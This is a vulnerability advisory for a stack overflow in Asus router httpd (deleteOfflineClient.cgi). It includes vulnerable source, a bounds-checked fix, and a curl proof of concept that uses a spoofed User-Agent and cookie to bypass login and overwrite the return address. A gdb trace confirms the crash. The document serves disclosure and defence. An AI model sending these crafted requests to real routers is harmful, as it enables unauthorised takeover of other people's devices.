## [Vulnerability]: ##
Stack buffer overflow in httpd
------------------------------------------
## [Exploitation]: ##
Control of $pc.
Combined with a session hijack vulnerability or a CSRF attack, this allows remote code execution and a connect-back shell.
------------------------------------------
## [Vendor of Product]: ##
Asus wireless router
------------------------------------------
## [Affected Products and firmware version]: ##
	Asuswrt-Merlin: all firmware versions (the latest is 380.67_0)
	RT-AC5300: all firmware versions, including the latest and earlier
	RT_AC1900P: all firmware versions, including the latest and earlier
	RT-AC68U: all firmware versions, including the latest and earlier
	RT-AC68P: all firmware versions, including the latest and earlier
	RT-AC88U: all firmware versions, including the latest and earlier
	RT-AC66U: all firmware versions, including the latest and earlier
	RT-AC66U_B1: all firmware versions, including the latest and earlier
	RT-AC58U: all firmware versions, including the latest and earlier
	RT-AC56U: all firmware versions, including the latest and earlier
	RT-AC55U: all firmware versions, including the latest and earlier
	RT-AC52U: all firmware versions, including the latest and earlier
	RT-AC51U: all firmware versions, including the latest and earlier
	RT-N18U: all firmware versions, including the latest and earlier
	RT-N66U: all firmware versions, including the latest and earlier
	RT-N56U: all firmware versions, including the latest and earlier
	RT-AC3200: all firmware versions, including the latest and earlier
	RT-AC3100: all firmware versions, including the latest and earlier
	RT_AC1200GU: all firmware versions, including the latest and earlier
	RT_AC1200G: all firmware versions, including the latest and earlier
	RT-AC1200: all firmware versions, including the latest and earlier
	RT-AC53: all firmware versions, including the latest and earlier
	RT-N12HP: all firmware versions, including the latest and earlier
	RT-N12HP_B1: all firmware versions, including the latest and earlier
	RT-N12D1: all firmware versions, including the latest and earlier
	RT-N12+: all firmware versions, including the latest and earlier
	RT_N12+_PRO: all firmware versions, including the latest and earlier
	RT-N16: all firmware versions, including the latest and earlier
	RT-N300: all firmware versions, including the latest and earlier
------------------------------------------
## [Attack Type]: ##
Remote
------------------------------------------
## [Can Cause Denial of Service?]: ##
Yes
------------------------------------------
## [Reference]: ##
https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/httpd/web.c#L9277,L9289
http://asuswrt.lostrealm.ca/
https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/  (choose another model on this page to download that model's firmware source code)
https://www.asus.com/Networking/Wireless-Routers-Products/
------------------------------------------
## [Discoverer]: ##
Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/
------------------------------------------
## [Affected components]: ##
Affected executable application: httpd
Affected source code file: release/src/router/httpd/web.c
Affected function: deleteOfflineClient(webs_t wp, char_t *urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query)
------------------------------------------
## [Vulnerability details]: ##
When deleteOfflineClient.cgi of the web manager (httpd) is requested, httpd calls deleteOfflineClient() to parse the URL of the HTTP GET request. It uses websGetVar() to read the value of the delete_offline_client parameter from the URL. However, when copying delete_offline_client into the stack buffer char mac_str[13], the length of the parameter is never limited, so mac_str[13] is overflowed. This stack-based overflow can be used to gain control over httpd's control flow by overwriting the saved $ra stored on the stack.
	void deleteOfflineClient(webs_t wp, char_t *urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query)
	{
		char *mac = NULL;
		char mac_str[13];       /* 13-byte stack buffer */
		int i;
		mac = websGetVar(wp, "delete_offline_client", "");   /* request-controlled, unlimited length */
		......
		......
		i = 0;
		while (*mac) {          /* i is never compared against sizeof(mac_str) */
			if (*mac == ':') {
				mac++;
				continue;
			}
			else {
				mac_str[i] = tolower(*mac);   /* writes past mac_str once i reaches 13 */
				i++;
				mac++;
			}
		}
		if (i != 12)            /* the length check runs only after the copy has finished */
			return;
		......
	}
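As an added example (not code from asuswrt-merlin or the advisory), the normalising loop above is isolated below beside a bounds-checked rewrite that refuses over-long or non-hex input before copying; the function names, MAC_STR_LEN and the test inputs are my own.

```c
/* Added example, not asuswrt-merlin code: the unbounded MAC-normalising loop
 * from deleteOfflineClient() isolated beside a bounds-checked rewrite.
 * The unbounded variant keeps the advisory's behaviour on purpose and is
 * only run here against a buffer large enough to observe the overrun. */
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define MAC_STR_LEN 12   /* 6 octets * 2 hex digits, colons stripped */

/* Same logic as the advisory's loop: strips ':' and lowercases every other
 * byte into out[] with no bound on i. Returns the number of bytes written so
 * the caller can see how far past a 13-byte buffer it would have gone.
 * Kept for comparison only. */
size_t mac_normalise_unbounded(const char *mac, char *out)
{
    size_t i = 0;
    while (*mac) {
        if (*mac == ':') { mac++; continue; }
        out[i++] = (char)tolower((unsigned char)*mac);
        mac++;
    }
    return i;
}

/* Hardened rewrite: validates before writing. Rejects any non-hex byte,
 * stops as soon as a 13th digit appears, and NUL-terminates. Returns 1 when
 * a valid 12-digit MAC has been written into out (out_len >= 13), else 0. */
int mac_normalise_bounded(const char *mac, char *out, size_t out_len)
{
    size_t i = 0;
    if (out_len < MAC_STR_LEN + 1)
        return 0;
    for (; *mac; mac++) {
        if (*mac == ':')
            continue;
        if (!isxdigit((unsigned char)*mac) || i >= MAC_STR_LEN)
            return 0;            /* bad byte or too long: refuse, copy nothing more */
        out[i++] = (char)tolower((unsigned char)*mac);
    }
    if (i != MAC_STR_LEN)
        return 0;
    out[i] = '\0';
    return 1;
}
```

Run against the advisory's 31-digit request value, the unbounded loop writes 31 bytes (18 past a 13-byte buffer) while the bounded version returns 0 without touching anything beyond the 13th byte.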
------------------------------------------
## [Exploitation details]: ##
Because access to the deleteOfflineClient.cgi page requires web authentication, a session hijack vulnerability or a CSRF attack is needed first to obtain access to deleteOfflineClient.cgi. After that, this vulnerability can be used to control httpd's control flow ($pc) by overwriting the saved $ra stored on the stack.
For example, sending an HTTP GET request such as:
	`GET /deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3 HTTP/1.1`
sets httpd's control flow $pc to 0x00333333 (the trailing '3' characters, 0x33 each, land on the saved $ra).
------------------------------------------
## [POC]: ##
	# Tested product and firmware version: RT-N12HP_B1 (3.0.0.4.380.3479)
	# With the help of CVE-2017-6549 (session hijack), this POC exploits the vulnerability to control $pc
	
	curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' http://192.168.2.1/deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3
------------------------------------------
## [Gdb trace]: ##
	admin@RT-N12HP_B1:/tmp/bin# ./gdb httpd $(pidof httpd)
	
	dlopen failed on 'libthread_db.so.1' - File not found
	GDB will not be able to debug pthreads.
	
	GNU gdb 6.8
	Copyright (C) 2008 Free Software Foundation, Inc.
	License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
	This is free software: you are free to change and redistribute it.
	There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
	and "show warranty" for details.
	This GDB was configured as "mipsel-linux"...
	I'm sorry, Dave, I can't do that.  Symbol format `elf32-tradlittlemips' unknown.
	Attaching to program: /usr/sbin/httpd, process 651
	0x2ad8d05c in ?? () from /lib/libc.so.0
	(gdb) c
	Continuing.
	
	Program received signal SIGSEGV, Segmentation fault.
	0x00333333 in ?? ()
	(gdb) i r
	          zero       at       v0       v1       a0       a1       a2       a3
	 R0   00000000 00000001 0000000c 00000000 004570ae 2adb90d0 0000001f 7fd973ff 
	            t0       t1       t2       t3       t4       t5       t6       t7
	 R8   2adb90d0 7fd973e0 00000000 7fd970f0 2adb9f38 2adcc124 6172500a 3a616d67 
	            s0       s1       s2       s3       s4       s5       s6       s7
	 R16  61616161 61616161 61616161 00000004 00446f4c 00000000 00446428 00498158 
	            t8       t9       k0       k1       gp       sp       s8       ra
	 R24  00000000 2ad9f7d0 2adcfa70 00000000 0044e8d0 7fd97400 00440000 00333333 
	        status       lo       hi badvaddr    cause       pc
	      01009c13 11288d57 00000001 00333332 00000008 00333333 
	          fcsr      fir  restart
	      00800000 00000000 00000000 
	(gdb) c
	Continuing.
	Program terminated with signal SIGSEGV, Segmentation fault.
	The program no longer exists.
As the trace shows, both $ra and $pc have been overwritten with 0x00333333.
Chained with a ROP payload, this leads to remote command execution.